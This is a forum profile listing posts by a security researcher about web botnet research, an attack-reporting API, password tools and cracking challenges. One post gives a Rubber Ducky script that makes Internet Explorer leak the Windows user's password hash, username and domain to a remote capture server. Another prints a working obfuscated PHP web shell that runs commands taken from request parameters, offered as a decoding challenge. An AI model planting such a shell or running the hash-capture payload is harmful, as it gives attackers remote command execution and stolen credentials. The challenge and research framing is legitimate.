Jump to content

bwall

Active Members
  • Posts

    74
  • Joined

  • Last visited

Posts posted by bwall

  1. Snort only does detection on a packet by packet basis(correct me if I'm wrong, its been a while), so I don't believe snort would work as a total solution, as different attacks can easily span more than one packet. I was thinking of writing an Apache/Nginx module that sent attack data, so at least that would handle vhosts. I'm still working on this though. Currently, I'm trying to find a good way to setup an easy to use SDK from various languages so attacks can be reported from plugins/IDSs/etc. I also have a few less public things as well, at least until I can get a good idea of how well they work out.

  2. Yes, as DigiP said, I have filtering methods in place and I confirm information before I merge it into a local database I'm using to conduct the research on. There is also value in gathering information on those who are trying to submit spam/erroneous information.

    If you are looking for the Attack Scanner link, its in DigiP's signature, but in the case that changes at some point, here it is: http://www.attack-scanner.com/

    If you are looking to develop an application/honeypot that will submit information to the API, feel free to contact me about implementation code in the language you are using.

  3. For the past few months(even maybe half a year now), along with DigiP, I have been researching web botnets, attacks they use, and common web shells they use. As a result, we have been able to release products to help protect against their spreading attacks and released 2 exploits for taking down the botnets themselves.

    The issue we have run into is that we have a limited amount of data/honey pots to work with. While we do have some collecting data, the data being gathered is somewhat limited. This is why I started the Attack-Analysis project. This project is designed to host a web API to post general attack information to when your webserver or honey pot receives an attack. This attack data is then pumped into a database, which is later analyzed by me to come up with details on these botnets, including exploits to take them down or in a slightly less ethical manor, take control of them.

    The details for the API are here: https://defense.ballastsecurity.net/wiki/index.php/Attack_Analysis

    Another place that you can help is with the payload decoder, which archives and decodes RFI payloads. The details for that are here: https://defense.ballastsecurity.net/wiki/index.php/RFI_Payload_Decoder

    and the results are currently hosted here along with the archived sources: https://defense.ballastsecurity.net/decoding/index.php

    The exploits:

    http://www.exploit-db.com/exploits/24883/

    http://www.exploit-db.com/exploits/20168/

    So if you want to help the good fight, please help out anyway you can. I try to make everything I release as open source as possible, but somethings need to stay a bit in the dark for security's sake, because I know botters follow my work.

  4. Can't really account for collisions, especially since it depends on what hashing method is employed by the web server. Also, different salts can rule out predictable collisions.

    if hash(pass1 + salt1) == hash(pass2 + salt1): hash(pass1 + salt2) != hash(pass2 + salt2)

  5. For everyone who uses a password manager, this might be a good extension for you to try. After doing a bit of research, I found that most hash cracking software can not crack passwords over 125 characters. While a 125 character password is extremely strong, 126 makes it so hash cracking software must be modified(which can be a pain as I found after helping patch John the Ripper). I was sad to see that password managers don't have the option to create passwords that large(for the most part), so I decided to create a simple Chrome extension to generate passwords at a variable length, with focus on massive passwords.

    Here's a link: https://chrome.google.com/webstore/detail/bwallhatestwits-password/gocfgmeinifgmkhjkdmfjolfmpfpfnbg

    Feel free to send any questions/comments my way.

  6. I got a Rubber Ducky for xmas, and figured I would start with a simple script before I went into encoded binaries. So as far as useful, I figured I would a testing file I have up on my server which tricks IE into trying to connect to a fake CIFS server, sending a double salted hash of the user's password on the Windows box, along with the username and domain.

    This information is then dumped to a web readable file.

    DELAY 1000
    CONTROL ESCAPE
    DELAY 50
    STRING iexplore.exe http://firebwall.com/test.html
    ENTER
    DELAY 2000
    ALT f
    STRING x
    REM http://firebwall.com/hashlog.txt will show the exchange that you can run password cracking on

    I have a custom CIFS server up, but there is a metasploit module you can run on your own. If you do not wish to make your IP, password hash, username and domain publicly available, do not go to test.html with anything other than wget or curl.

  7. I read the topic to this and was immediately interested. I am a big fan of hunting botters. Some of them make it really easy too. The number one thing you want to do is honey pot and sandbox anything you can get your hands on from the botnet. Get as much intelligence from them as you can, because they always do thoughtless things like hardcode a password into the bots, or connect to a C&C that isn't public.

    This topic also reminded me of a video I put out through Ballast Security a little while back, about exploiting a pBot RCE to destroy a whole botnet. DigiP did the music for this one I'm pretty sure.

  8. I'm sorry, but flooders are lame, flooders that don't use PCAP for packet crafting are even worse. Not only is your performance going to drop off a cliff after 65535 "connections" are used, its going to drop off even more when you hit the file descriptor limit on the OS. 20 lines of python using pcap and threads could trounce this, but it'll be a cold day in hell when you see me write a DoS tool.

    This is a prime example of an Anonymous member. So unbelievably ignorant to even the attack methods they use as their primary attack, horrible coding skills, then thinks hes going to get kudos for posting about DoS tools in a SECURITY thread?

  9. I never claimed to be an pwngrammer..lol

    I was just trying to bypass having to know the password and hoping that whatever I made it to be, the rest would fall in place based on what I fed it, but I guess it won't work that way with this script. I know we've done something similar like that in the past but I guess with all your pack and unpack binary stuff, it has to match exactly or it barfs, so I am at a loss other than brute forcing the password..lol

    Still, I get a syntax error for the pack-unpack stuff, but maybe thats because I don't have the proper password to make the rest of the functions and code stuff appear properly.

    Did you try using the latest code I pasted? Fixed a backwards compatibility issue.

  10. Those that find that they get the "unexpected '[' error", it is caused by syntax that requires version 5.4 or newer of php.

    Looking at the code again I can see it will take a while to devise the a way to attack this without simply replacing the code with a logger to grab the password when the attacker attempts to run a command.

    If anyone else is looking at this then as we know you can assume that $e = "system". I also believe that $e1="passthru" and $fex = "function_exists".

    I have based these assumptions on the number of characters returned from the pack function when called with the 'I', 'S' and 'C' options (4, 2 and 1 respectively). Which gives us a length of 8 for the length of $e1 function name (passthru) and 15 for the length of the $fex function name (function_exists).

    You are correct with those assumptions. You can also replace "I" with "L".

    Is there a backward compatible syntax for pack < 5.4? Feeling particularly lazy today >.<

    Last night I put together a script that can generate this shell with any password, but I will not be releasing it until someone solves this. I am open to help anyone looking for optimizing a cracking method.

    DigiP - You mixed that up, $_REQUEST[pack("l",1936941424)] is $_REQUEST['pass'] not 'pass'. Just a simple way to input the pass via $_GET/$_POST/$_COOKIE

    Code Update:

    <?php
    @error_reporting(0);
    $p=str_rot13("cnpx");
    if(!isset($_REQUEST[pack("L",1936941424)]))exit();
    $h=$_REQUEST[pack("L",1936941424)];
    for($i=0;$i<10000;$i++)$h=md5($h,1);
    $h=md5($h,1);$t=unpack("L",$h);$t1=unpack("S",$h);$t2=unpack("C",$h);$e=$p("L",4336671913-$t[1]).$p("S",86171-$t1[1]);
    $h=md5($h,1);$t=unpack("L",$h);$t1=unpack("S",$h);$t2=unpack("C",$h);$e1=$p("L",2317167118-$t[1]).pack("L",2350657810-$t[1]);
    $h=md5($h,1);$t=unpack("L",$h);$t1=unpack("S",$h);$t2=unpack("C",$h);$fex=$p("L",2029019048-$t[1]).$p("L",2213630902-$t[1]).$p("L",2130333601-$t[1]).$p("S",89781-$t1[1]).$p("C",181-$t2[1]);
    $h=md5($h,1);$t=unpack("L",$h);$t1=unpack("S",$h);$t2=unpack("C",$h);
    $r=$_REQUEST[$p("L",4994670222-$t[1])];
    if($fex($e)){$e($r);}
    else if($fex($e1)){$e1($r);}
    ?>

    This should fix the PHP version issue.

  11. 3 hints. If the password is wrong, errors will be thrown.

    Also, yes the password is iteratively hashed 10k times with MD5 then used to encrypt values, then is further hashed.

    For the brute force angle, assume $e = "system"

    Edit:

    I'd also like to point out a good point. I should not have used "I" for packing, "L" or "N" would have been better choices. This shell is confirmed to work on an x64 IntelĀ® Core i7-2620M CPU. x64 and x86 should not matter in this case since only 32 bit integers are being dealt with.

    Some help with the password(brute forcing will take a LONG time without an optimized attack): The alpha is [a-zA-Z0-9]. The idea was to make it so brute forcing would not be a viable option, even for a forensics enthusiast like me with processing power(GPU and CPU) out the ass.

  12. So I see a lot of obfuscated/encoded PHP payloads used in RFI attacks. In general though, they are trivial to decode(Decoding tool I develop https://firebwall.com/decoding/index.php). After writing 2 papers on how and why they could be developed better(http://firebwall.com/research/InsecurityofPoorlyDesignedRemoteFileInclusionPayloads-P1.pdf http://firebwall.com/research/InsecurityofPoorlyDesignedRemoteFileInclusionPayloads-Part2.pdf (written with DigiP)), and only seeing simple increases in the attempt to hide information, I decided to spend an hour and write one that actually was not only hard to decode, but hard to take control over.

    I put this challenge to the Hak5 community, tell me the password I'm using and how to run commands. I'm certain the Transferable State Attack would help you in your decryption process.

    Here is the payload: http://pastebin.com/W92Q0Q9j

    Happy Hacking :D

  13. My long envied WAF Apache module is finally available for purchase. It uses regular expression rules(user defined) against the URI being requested to determine if the request should be dropped or not. I use this module as a cornerstone of my web server security and have various scripts built around it to bridge the gap between the web server and the firewall.

    Here is the link to the page describing the WAF: https://www.ballastsecurity.net/mod_ballastsec_waf/

    Here is a link to a sample of how to integrate it into your web server firewall: https://www.ballastsecurity.net/blog/mod_ballastsec_waf-iptables-and-ipset/

    If someone is willing to donate a server, I am willing to write a version that doesn't permanently ban rule offenders so people can get a feel for how it works and play with it a bit.

    #AnotherOneBitesTheDust

  14. I agree bobbyb, the initial PoC with basic character sequence signatures does not seem to be verbose enough. Ideally, I wanted to do matches on those because it allowed for the smallest databases, but I clearly need to expand to 3 char combos, 4 char combos, and then full words as well.

  15. If you have known me a while, you know I like to work with markov chains to do various things. In this case, it is to match typed text to its author based on matching markov chains. I'll do a brief overview of the concept real quick. We all tend to type things a bit differently, making distinguishable typos, saying things certain ways, even hitting random characters in a similar way. People who have been typing for a long time mostly do it based on muscle memory which is not very different from a markov chain.

    If we do an analysis of the sequence the characters are outputted, we can use that information in markov chains to determine how close it matches to a person's typing style. This idea can be applied to identify who typed something out of a group of people(so good for confirming or denying that a profile using the same nickname as another can be matched to that nickname on more than just the name), to generate the most likely password guesses for a particular user, and even to detect if a new user connected to a server actually matches the usual user. It has a lot of applications, but the results can be hard to decipher. That is something I am still working on. The source for this project can be found here in python: https://github.com/bwall/markov-analysis

    I'm still working on it and trying to make input/output as widely applicable as possible.

  16. Ballast Security is having another hash cracking competition, but this time it is a bit more. The rules for competition 3 are that who ever is in the lead when the hashes run out, chooses the next set of challenge hashes. So any hashes they can't crack, they put the other players to the test, and everyone has access to the results from the challenges. So its a combination of a hash cracking challenge as well as a community hash cracking project. You can find more here: https://www.ballastsecurity.net/forum/index.php/topic,6.0.html

×
×
  • Create New...